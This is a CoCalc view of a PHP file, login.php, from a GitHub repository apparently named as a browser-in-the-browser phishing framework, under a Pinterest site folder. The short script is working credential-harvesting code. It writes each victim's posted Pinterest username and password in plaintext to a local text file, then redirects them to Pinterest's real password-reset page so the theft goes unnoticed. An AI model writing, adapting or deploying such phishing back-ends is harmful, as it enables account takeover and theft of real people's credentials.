Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
surya-dev-singh
GitHub Repository: surya-dev-singh/bitb-framwork
Path: blob/main/sites/pinterest/login.php
1050 views
1
<?php
2
file_put_contents("../userpass/usernames.txt", "Pinterest Username: " . $_POST['id'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
3
header('Location: https://www.pinterest.com/password/reset/');
4
exit();
5
?>
6